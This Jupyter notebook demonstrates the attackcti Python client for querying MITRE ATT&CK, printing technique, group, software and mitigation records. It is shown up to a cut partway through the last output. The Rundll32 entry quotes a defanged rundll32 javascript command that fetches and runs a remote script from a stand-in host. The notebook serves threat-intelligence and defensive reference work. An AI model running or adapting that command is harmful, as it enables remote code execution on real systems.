{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# **MITRE ATT&CK API FILTERS**: Python Client\n",
"------------------"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Import ATTACK API Client"
]
},
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"from attackcti import attack_client"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Import Extra Libraries"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"from pandas import *\n",
"from pandas.io.json import json_normalize"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Initialize ATT&CK Client Variable"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"lift = attack_client()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Technique by Name (TAXII)\n",
"You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive."
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [],
"source": [
"technique_name = lift.get_technique_by_name('Rundll32')"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"[{'type': 'attack-pattern',\n",
" 'id': 'attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5',\n",
" 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n",
" 'created': '2017-05-31 21:31:06.045000+00:00',\n",
" 'modified': '2018-10-17 00:14:20.652000+00:00',\n",
" 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],\n",
" 'url': 'https://attack.mitre.org/techniques/T1085',\n",
" 'matrix': 'mitre-attack',\n",
" 'technique': 'Rundll32',\n",
" 'technique_description': 'The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\\n\\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\\n\\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\\\..\\\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)',\n",
" 'technique_detection': 'Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.',\n",
" 'tactic': ['defense-evasion', 'execution'],\n",
" 'technique_id': 'T1085',\n",
" 'capec_id': None,\n",
" 'capec_url': None,\n",
" 'platform': ['Windows'],\n",
" 'data_sources': ['File monitoring',\n",
" 'Process monitoring',\n",
" 'Process command-line parameters',\n",
" 'Binary file metadata'],\n",
" 'defense_bypassed': ['Anti-virus', 'Application whitelisting'],\n",
" 'permissions_required': ['User'],\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': False,\n",
" 'contributors': ['Ricardo Dias', 'Casey Smith'],\n",
" 'technique_references': ['https://attack.mitre.org/techniques/T1085',\n",
" 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf',\n",
" 'https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'],\n",
" 'detectable_by_common_defenses': None,\n",
" 'detectable_explanation': None,\n",
" 'difficulty_for_adversary': None,\n",
" 'difficulty_explanation': None,\n",
" 'tactic_type': None}]"
]
},
"execution_count": 5,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"technique_name"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Data Sources from All Techniques (TAXII)\n",
"* You can also get all the data sources available in ATT&CK\n",
"* Currently the only techniques with data sources are the ones in Enterprise ATT&CK."
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [],
"source": [
"data_sources = lift.get_all_data_sources()"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"50"
]
},
"execution_count": 7,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"len(data_sources)"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"['data loss prevention',\n",
" 'mail server',\n",
" 'named pipes',\n",
" 'application logs',\n",
" 'netflow/enclave netflow',\n",
" 'sensor health and status',\n",
" 'mbr',\n",
" 'wmi objects',\n",
" 'process use of network',\n",
" 'disk forensics',\n",
" 'services',\n",
" 'asset management',\n",
" 'network protocol analysis',\n",
" 'network intrusion detection system',\n",
" 'windows registry',\n",
" 'detonation chamber',\n",
" 'process command-line parameters',\n",
" 'packet capture',\n",
" 'environment variable',\n",
" 'anti-virus',\n",
" 'malware reverse engineering',\n",
" 'ssl/tls inspection',\n",
" 'windows error reporting',\n",
" 'web logs',\n",
" 'kernel drivers',\n",
" 'digital certificate logs',\n",
" 'authentication logs',\n",
" 'user interface',\n",
" 'powershell logs',\n",
" 'third-party application logs',\n",
" 'bios',\n",
" 'web application firewall logs',\n",
" 'host network interface',\n",
" 'vbr',\n",
" 'dll monitoring',\n",
" 'network device logs',\n",
" 'browser extensions',\n",
" 'file monitoring',\n",
" 'process monitoring',\n",
" 'email gateway',\n",
" 'access tokens',\n",
" 'binary file metadata',\n",
" 'efi',\n",
" 'web proxy',\n",
" 'api monitoring',\n",
" 'windows event logs',\n",
" 'system calls',\n",
" 'component firmware',\n",
" 'loaded dlls',\n",
" 'dns records']"
]
},
"execution_count": 8,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"data_sources"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Any STIX Object by ID (TAXII)\n",
"* You can get any STIX object by its id across all the matrices. It is case sensitive.\n",
"* You can use the following STIX Object Types:\n",
" * attack-pattern > techniques\n",
" * course-of-action > mitigations\n",
" * intrusion-set > groups\n",
" * malware\n",
" * tool"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [],
"source": [
"object_by_id = lift.get_object_by_attack_id('attack-pattern', 'T1307')"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"[{'type': 'attack-pattern',\n",
" 'id': 'attack-pattern--286cc500-4291-45c2-99a1-e760db176402',\n",
" 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n",
" 'created': '2017-12-14 16:46:06.044000+00:00',\n",
" 'modified': '2018-10-17 00:14:20.652000+00:00',\n",
" 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],\n",
" 'url': 'https://attack.mitre.org/techniques/T1307',\n",
" 'matrix': 'mitre-pre-attack',\n",
" 'technique': 'Acquire and/or use 3rd party infrastructure services',\n",
" 'technique_description': 'A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LUCKYCAT2012)',\n",
" 'technique_detection': None,\n",
" 'tactic': ['adversary-opsec'],\n",
" 'technique_id': 'T1307',\n",
" 'capec_id': None,\n",
" 'capec_url': None,\n",
" 'platform': None,\n",
" 'data_sources': None,\n",
" 'defense_bypassed': None,\n",
" 'permissions_required': None,\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': None,\n",
" 'contributors': None,\n",
" 'technique_references': ['https://attack.mitre.org/techniques/T1307',\n",
" 'LUCKYCAT2012'],\n",
" 'detectable_by_common_defenses': 'No',\n",
" 'detectable_explanation': '3rd party services highly leveraged by legitimate services, hard to distinguish from background noise. While an adversary can use their own infrastructure, most know this is a sure- re way to get caught. To add degrees of separation, they can buy or rent from another adversary or accomplice.',\n",
" 'difficulty_for_adversary': 'Yes',\n",
" 'difficulty_explanation': 'Wide range of 3rd party services for hosting, rotating, or moving C2, static data, exploits, exfiltration, etc.',\n",
" 'tactic_type': None}]"
]
},
"execution_count": 10,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"object_by_id"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Any Group by Alias (TAXII)\n",
"You can get any Group by its Alias property across all the matrices. It is case sensitive."
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [],
"source": [
"group_name = lift.get_group_by_alias('Cozy Bear')"
]
},
{
"cell_type": "code",
"execution_count": 12,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"[{'type': 'intrusion-set',\n",
" 'id': 'intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542',\n",
" 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n",
" 'matrix': 'mitre-attack',\n",
" 'created': '2017-05-31 21:31:52.748000+00:00',\n",
" 'modified': '2018-10-17 00:14:20.652000+00:00',\n",
" 'url': 'https://attack.mitre.org/groups/G0016',\n",
" 'group': 'APT29',\n",
" 'group_description': '[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)',\n",
" 'group_aliases': ['APT29', 'The Dukes', 'Cozy Bear', 'CozyDuke'],\n",
" 'group_id': 'G0016',\n",
" 'group_references': ['https://attack.mitre.org/groups/G0016',\n",
" 'APT29',\n",
" 'The Dukes',\n",
" 'Cozy Bear',\n",
" 'CozyDuke',\n",
" 'https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf',\n",
" 'https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/',\n",
" 'https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf']}]"
]
},
"execution_count": 12,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"group_name"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Relationships by Any Object (TAXII)\n",
"* You can get specific relationships defined in ATT&CK for specific ogjects across all the matrices.\n",
"* The valid options are: **groups**, **software** and **mitigations**\n",
"* This function collects all the relationships available in ATT&CK via the **get_all_relationships()** function. Then, depending on the specific stix object requested, the information is filtered.\n",
"* The function enriches the ouput of the **get_all_relationships()** one by adding more context to the **source object** defined in the **Relationships stix object**.\n",
"* You get more information about the source and also keep the **target source** object id to then map the results to the target stix object."
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [],
"source": [
"relationships = lift.get_relationships_by_object('software')"
]
},
{
"cell_type": "code",
"execution_count": 14,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'target_object': 'attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f',\n",
" 'relationship_id': 'relationship--66440b92-cfed-441c-85fd-1d103684a187',\n",
" 'relationship': 'uses',\n",
" 'relationship_description': '[Koadic](https://attack.mitre.org/software/S0250) can retrieve the current content of the user clipboard.',\n",
" 'software_type': 'tool',\n",
" 'matrix': 'mitre-attack',\n",
" 'software': 'Koadic',\n",
" 'software_description': '[Koadic](https://attack.mitre.org/software/S0250) is a Windows post-exploitation framework and penetration testing tool. [Koadic](https://attack.mitre.org/software/S0250) is publicly available on GitHub and the tool is executed via the command-line. [Koadic](https://attack.mitre.org/software/S0250) has several options for staging payloads and creating implants. [Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host. (Citation: Github Koadic) (Citation: Palo Alto Sofacy 06-2018)',\n",
" 'software_labels': ['tool'],\n",
" 'software_id': 'S0250',\n",
" 'url': 'https://attack.mitre.org/software/S0250',\n",
" 'software_aliases': ['Koadic'],\n",
" 'software_references': ['https://attack.mitre.org/software/S0250',\n",
" 'Koadic',\n",
" 'https://github.com/zerosum0x0/koadic',\n",
" 'https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/'],\n",
" 'software_platform': ['Windows']}"
]
},
"execution_count": 14,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"relationships[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get All Techniques with Mitigations (TAXII)\n",
"The difference with this function and **get_all_techniques()** is that **get_all_techniques_with_mitigations** returns (of course haha) mitigations mapped to their respective techniques. This is useful for when you want to gather mitigations and techniques all at once."
]
},
{
"cell_type": "code",
"execution_count": 15,
"metadata": {},
"outputs": [],
"source": [
"complete_techniques = lift.get_all_techniques_with_mitigations()"
]
},
{
"cell_type": "code",
"execution_count": 16,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'mitigation': 'Account Manipulation Mitigation',\n",
" 'mitigation_description': 'Use multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).\\n\\nProtect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.',\n",
" 'mitigation_references': ['https://attack.mitre.org/techniques/T1098'],\n",
" 'technique': 'Account Manipulation',\n",
" 'technique_description': 'Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.',\n",
" 'technique_detection': 'Collect events that correlate with changes to account objects on systems and the domain, such as event ID 4738. (Citation: Microsoft User Modified Event) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ (Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password. (Citation: GitHub Mimikatz Issue 92 June 2017)\\n\\nUse of credentials may also occur at unusual times or to unusual systems or services and may correlate with other suspicious activity.',\n",
" 'tactic': ['credential-access', 'persistence'],\n",
" 'url': 'https://attack.mitre.org/techniques/T1098',\n",
" 'technique_id': 'T1098',\n",
" 'capec_id': None,\n",
" 'capec_url': None,\n",
" 'platform': ['Windows'],\n",
" 'data_sources': ['Authentication logs',\n",
" 'API monitoring',\n",
" 'Windows event logs',\n",
" 'Packet capture'],\n",
" 'defense_bypassed': None,\n",
" 'permissions_required': ['Administrator'],\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': None,\n",
" 'contributors': ['Tim MalcomVetter'],\n",
" 'technique_references': ['https://attack.mitre.org/techniques/T1098',\n",
" 'https://docs.microsoft.com/windows/device-security/auditing/event-4738',\n",
" 'https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM',\n",
" 'https://github.com/gentilkiwi/mimikatz/issues/92'],\n",
" 'detectable_by_common_defenses': None,\n",
" 'detectable_explanation': None,\n",
" 'difficulty_for_adversary': None,\n",
" 'difficulty_explanation': None,\n",
" 'tactic_type': None}"
]
},
"execution_count": 16,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"complete_techniques[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Techniques Used by Software (TAXII)\n",
"If you do not provide the name of a specific **Software** (Case Sensitive), the function returns information about every piece of software across all the matrices."
]
},
{
"cell_type": "code",
"execution_count": 17,
"metadata": {},
"outputs": [],
"source": [
"software_techniques = lift.get_techniques_used_by_software('BITSAdmin')"
]
},
{
"cell_type": "code",
"execution_count": 18,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'relationship_id': 'relationship--9edfa8b5-2e9f-4022-93b2-fd819156fe95',\n",
" 'target_object': 'attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add',\n",
" 'relationship_description': '[BITSAdmin](https://attack.mitre.org/software/S0190) can be used to create [BITS Jobs](https://attack.mitre.org/techniques/T1197) to upload and/or download files.',\n",
" 'relationship': 'uses',\n",
" 'software': 'BITSAdmin',\n",
" 'software_description': '[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)',\n",
" 'software_labels': ['tool'],\n",
" 'software_id': 'S0190',\n",
" 'software_aliases': ['BITSAdmin'],\n",
" 'software_references': ['https://attack.mitre.org/software/S0190',\n",
" 'https://msdn.microsoft.com/library/aa362813.aspx'],\n",
" 'software_platform': ['Windows'],\n",
" 'technique': 'Remote File Copy',\n",
" 'technique_description': 'Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as [FTP](https://attack.mitre.org/software/S0095). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\\n\\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076).',\n",
" 'technique_detection': 'Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\\n\\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)',\n",
" 'tactic': ['command-and-control', 'lateral-movement'],\n",
" 'url': 'https://attack.mitre.org/techniques/T1105',\n",
" 'technique_id': 'T1105',\n",
" 'capec_id': None,\n",
" 'capec_url': None,\n",
" 'platform': ['Linux', 'macOS', 'Windows'],\n",
" 'data_sources': ['File monitoring',\n",
" 'Packet capture',\n",
" 'Process use of network',\n",
" 'Netflow/Enclave netflow',\n",
" 'Network protocol analysis',\n",
" 'Process monitoring'],\n",
" 'defense_bypassed': None,\n",
" 'permissions_required': ['User'],\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': True,\n",
" 'remote_support': None,\n",
" 'contributors': None,\n",
" 'technique_references': ['https://attack.mitre.org/techniques/T1105',\n",
" 'https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf'],\n",
" 'detectable_by_common_defenses': None,\n",
" 'detectable_explanation': None,\n",
" 'difficulty_for_adversary': None,\n",
" 'difficulty_explanation': None,\n",
" 'tactic_type': None}"
]
},
"execution_count": 18,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"software_techniques[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Techniques Used by Group (TAXII)\n",
"If you do not provide the name of a specific **Group** (Case Sensitive), the function returns information about all the groups available across all the matrices."
]
},
{
"cell_type": "code",
"execution_count": 19,
"metadata": {},
"outputs": [],
"source": [
"group_techniques = lift.get_techniques_used_by_group('APT29')"
]
},
{
"cell_type": "code",
"execution_count": 20,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'relationship_id': 'relationship--410f6714-cd02-4253-b324-a8ac15e70bca',\n",
" 'target_object': 'attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38',\n",
" 'relationship_description': '[APT29](https://attack.mitre.org/groups/G0016) has used spearphishing with an attachment to deliver files with exploits to initial victims.',\n",
" 'relationship': 'uses',\n",
" 'group': 'APT29',\n",
" 'group_description': '[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)',\n",
" 'group_aliases': ['APT29', 'The Dukes', 'Cozy Bear', 'CozyDuke'],\n",
" 'group_id': 'G0016',\n",
" 'group_references': ['https://attack.mitre.org/groups/G0016',\n",
" 'APT29',\n",
" 'The Dukes',\n",
" 'Cozy Bear',\n",
" 'CozyDuke',\n",
" 'https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf',\n",
" 'https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/',\n",
" 'https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf'],\n",
" 'technique': 'Spearphishing Attachment',\n",
" 'technique_description': \"Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\\n\\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.\",\n",
" 'technique_detection': \"Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\\n\\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) and [Scripting](https://attack.mitre.org/techniques/T1064).\",\n",
" 'tactic': ['initial-access'],\n",
" 'url': 'https://attack.mitre.org/techniques/T1193',\n",
" 'technique_id': 'T1193',\n",
" 'capec_id': ['CAPEC-163'],\n",
" 'capec_url': ['https://capec.mitre.org/data/definitions/163.html'],\n",
" 'platform': ['Windows', 'macOS', 'Linux'],\n",
" 'data_sources': ['File monitoring',\n",
" 'Packet capture',\n",
" 'Network intrusion detection system',\n",
" 'Detonation chamber',\n",
" 'Email gateway',\n",
" 'Mail server'],\n",
" 'defense_bypassed': None,\n",
" 'permissions_required': None,\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': None,\n",
" 'contributors': None,\n",
" 'technique_references': ['https://attack.mitre.org/techniques/T1193',\n",
" 'https://capec.mitre.org/data/definitions/163.html'],\n",
" 'detectable_by_common_defenses': None,\n",
" 'detectable_explanation': None,\n",
" 'difficulty_for_adversary': None,\n",
" 'difficulty_explanation': None,\n",
" 'tactic_type': None}"
]
},
"execution_count": 20,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"group_techniques[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Software Used by Group (TAXII)\n",
"If you do not provide the name of a specific Group, it returns information about all the groups available across all the matrices."
]
},
{
"cell_type": "code",
"execution_count": 21,
"metadata": {},
"outputs": [],
"source": [
"group_software = lift.get_software_used_by_group('APT12')"
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'relationship_description': None,\n",
" 'group': 'APT12',\n",
" 'group_description': '[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n",
" 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n",
" 'group_id': 'G0005',\n",
" 'group_references': ['https://attack.mitre.org/groups/G0005',\n",
" 'APT12',\n",
" 'IXESHE',\n",
" 'DynCalc',\n",
" 'Numbered Panda',\n",
" 'DNSCALC',\n",
" 'http://www.crowdstrike.com/blog/whois-numbered-panda/',\n",
" 'https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html'],\n",
" 'software_url': 'https://attack.mitre.org/software/S0015',\n",
" 'software': 'Ixeshe',\n",
" 'software_description': '[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)',\n",
" 'software_labels': ['malware'],\n",
" 'software_id': 'S0015',\n",
" 'software_aliases': ['Ixeshe'],\n",
" 'software_references': ['https://attack.mitre.org/software/S0015',\n",
" 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'],\n",
" 'software_platform': ['Windows']}"
]
},
"execution_count": 22,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"group_software[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Everything Used by Group (TAXII)\n",
"* This function does not provide techniques defined for each Software that was used by group.\n",
"* The information returned covers techniques that were used by a group and the name and description of software.\n",
"* If you do not provide the name of a specific **Group**, it returns information about all the groups available across all the matrices."
]
},
{
"cell_type": "code",
"execution_count": 23,
"metadata": {},
"outputs": [],
"source": [
"all_used_by_group = lift.get_all_used_by_group('APT12')"
]
},
{
"cell_type": "code",
"execution_count": 24,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'relationship_description': None,\n",
" 'group': 'APT12',\n",
" 'group_description': '[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n",
" 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n",
" 'group_id': 'G0005',\n",
" 'group_references': ['https://attack.mitre.org/groups/G0005',\n",
" 'APT12',\n",
" 'IXESHE',\n",
" 'DynCalc',\n",
" 'Numbered Panda',\n",
" 'DNSCALC',\n",
" 'http://www.crowdstrike.com/blog/whois-numbered-panda/',\n",
" 'https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html'],\n",
" 'software_url': 'https://attack.mitre.org/software/S0015',\n",
" 'software': 'Ixeshe',\n",
" 'software_description': '[Ixeshe](https://attack.mitre.org/software/S0015) is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)',\n",
" 'software_labels': ['malware'],\n",
" 'software_id': 'S0015',\n",
" 'software_aliases': ['Ixeshe'],\n",
" 'software_references': ['https://attack.mitre.org/software/S0015',\n",
" 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'],\n",
" 'software_platform': ['Windows']}"
]
},
"execution_count": 24,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"all_used_by_group[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get All ATT&CK (TAXII)\n",
"* This function collects everything from the ATT&CK framework and presents it as a long list of dictionaries making it easy to display the results as a table unlike the **get_all_stix_objects()** function that returns a dictionary.\n",
"* It collects all the information from the following functions:\n",
" * **get_all_techniques_with_mitigations()**\n",
" * **get_all_software()**\n",
" * **get_techniques_used_by_software()**\n",
" * **get_all_groups()**\n",
" * **get_all_used_by_group()**"
]
},
{
"cell_type": "code",
"execution_count": 25,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"CPU times: user 18.3 s, sys: 402 ms, total: 18.7 s\n",
"Wall time: 30.3 s\n"
]
}
],
"source": [
"%time all_attack_framework = lift.get_all_attack()"
]
},
{
"cell_type": "code",
"execution_count": 26,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"list"
]
},
"execution_count": 26,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"type(all_attack_framework)"
]
},
{
"cell_type": "code",
"execution_count": 27,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'mitigation': 'Account Manipulation Mitigation',\n",
" 'mitigation_description': 'Use multifactor authentication. Follow guidelines to prevent or limit adversary access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).\\n\\nProtect domain controllers by ensuring proper security configuration for critical servers. Configure access controls and firewalls to limit access to these systems. Do not allow domain administrator accounts to be used for day-to-day operations that may expose them to potential adversaries on unprivileged systems.',\n",
" 'mitigation_references': ['https://attack.mitre.org/techniques/T1098'],\n",
" 'technique': 'Account Manipulation',\n",
" 'technique_description': 'Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.',\n",
